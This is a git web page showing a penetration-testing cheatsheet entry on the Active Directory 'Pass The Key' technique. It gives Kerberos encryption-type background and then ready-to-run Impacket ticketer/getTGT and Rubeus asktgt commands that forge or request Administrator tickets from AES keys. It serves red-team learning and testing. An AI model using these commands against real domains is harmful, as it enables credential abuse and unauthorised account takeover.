daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

hash-pass-the-key.md (3420B)


      1 ---
      2 title: "Hash - Pass The Key"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/hash-pass-the-key.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-pass-the-key.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Hash - Pass The Key
     12 
     13 Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.
     14 
     15 Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.
     16 
     17 * **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it.
     18 * **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)).
     19 * **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools.
     20 * **AES256**: AES256-CTS-HMAC-SHA1-96 (18)
     21 
     22 In the past, there were more encryptions methods, that have now been deprecated.
     23 
     24 | enctype                    | weak? | krb5   | Windows |
     25 | -------------------------- | ----- | ------ | ------- |
     26 | des-cbc-crc                | weak  | <1.18  | >=2000  |
     27 | des-cbc-md4                | weak  | <1.18  | ?       |
     28 | des-cbc-md5                | weak  | <1.18  | >=2000  |
     29 | des3-cbc-sha1              |       | >=1.1  | none    |
     30 | arcfour-hmac               |       | >=1.3  | >=2000  |
     31 | arcfour-hmac-exp           | weak  | >=1.3  | >=2000  |
     32 | aes128-cts-hmac-sha1-96    |       | >=1.3  | >=Vista |
     33 | aes256-cts-hmac-sha1-96    |       | >=1.3  | >=Vista |
     34 | aes128-cts-hmac-sha256-128 |       | >=1.15 | none    |
     35 | aes256-cts-hmac-sha384-192 |       | >=1.15 | none    |
     36 | camellia128-cts-cmac       |       | >=1.9  | none    |
     37 | camellia256-cts-cmac       |       | >=1.9  | none    |
     38 
     39 Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default.
     40 
     41 Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket.
     42 
     43 ## Generate a new ticket
     44 
     45 * [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py)
     46 
     47     ```powershell
     48     impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060
     49     ```
     50 
     51 ## Request a TGT
     52 
     53 * [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py)
     54 
     55     ```powershell
     56     impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local
     57     ```
     58 
     59 * [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
     60 
     61     ```powershell
     62     .\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt
     63     .\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt
     64     ```
     65 
     66 ## References
     67 
     68 * [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)